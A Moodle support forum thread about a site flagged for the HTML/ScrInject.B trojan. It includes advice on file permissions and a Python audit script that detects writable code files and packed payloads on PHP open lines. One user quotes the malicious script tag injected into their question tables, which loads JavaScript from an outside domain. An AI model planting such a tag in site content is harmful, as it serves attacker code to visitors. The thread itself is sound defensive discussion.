Howto find Trojan HTML/ScrInject.B trojan on my site?

Re: Howto find Trojan HTML/ScrInject.B trojan on my site?

by Howard Miller -
Number of replies: 1
Firstly, I have no idea what that Trojan actually is. We regularly see false positives around Moodle so there may not be anything to worry about.

The only way that the code can be updated is if you have incorrect permissions. It is vital (assuming your site is accessible from the public internet) that the Moodle code files are NOT writeable by the web server user. The classic trojan in PHP code will write a whole bunch of seemingly random characters on the <?php line. That's worth looking for in common files like config.php and the main index.php.
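
The two checks described in the post above, as an added example that is not part of the original thread or Moodle's own code: a Python script that flags paths the web server user can modify and PHP files whose `<?php` line carries a long or packed run of characters. The 200- and 80-character thresholds are assumptions, and only mode bits are examined (no ACLs).

```python
import os
import pwd
import re
import stat
import sys

MAX_OPEN_LINE = 200                         # assumed threshold for a clean "<?php" line
BLOB = re.compile(r"[A-Za-z0-9+/=]{80,}")   # long unbroken run, typical of packed code

def suspicious_open_line(path):
    """True if the line holding the first '<?php' carries a long or packed payload."""
    with open(path, "r", errors="replace") as fh:
        for line in fh:
            if "<?php" in line:
                rest = line.split("<?php", 1)[1].strip()
                return len(rest) > MAX_OPEN_LINE or bool(BLOB.search(rest))
    return False

def writable_by(path, uid, gids):
    """True if the mode bits let a process with this uid/gids modify the path."""
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return False                        # symlink modes are not meaningful
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)

def audit(root, uid, gids):
    """Walk a code tree; return sorted (relative path, finding) tuples."""
    findings = []
    for dirpath, dirs, files in os.walk(root):
        for name in dirs + files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if writable_by(path, uid, gids):
                findings.append((rel, "writable-by-web-user"))
            if name.endswith(".php") and os.path.isfile(path) and suspicious_open_line(path):
                findings.append((rel, "stuffed-php-open-line"))
    return sorted(findings)

if __name__ == "__main__":
    # Usage: audit.py /path/to/moodle apache   ("apache" is the usual CentOS web user)
    user = pwd.getpwnam(sys.argv[2])
    groups = set(os.getgrouplist(user.pw_name, user.pw_gid))
    for rel, finding in audit(sys.argv[1], user.pw_uid, groups):
        print(f"{finding}\t{rel}")
```

Run it against the Moodle code directory only; the moodledata directory is expected to be writable by the web server user.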

In reply to Howard Miller

Re: Howto find Trojan HTML/ScrInject.B trojan on my site?

by Jean-François PETIT -

Hi

I found malware injected in my database.

I am on Moodle 3.5 on CentOS.

//cooljorrd//

<script type="text/javascript" src="https://cooljorrd.com/222f7a82dfe46c1031.js"></script>

It affects questions and all the question, answer and feedback tables with HTML.

I want to allow scripts securely in the editor, but only for admin. Do you know how to clean the database, and how to forbid <script>?

Thanks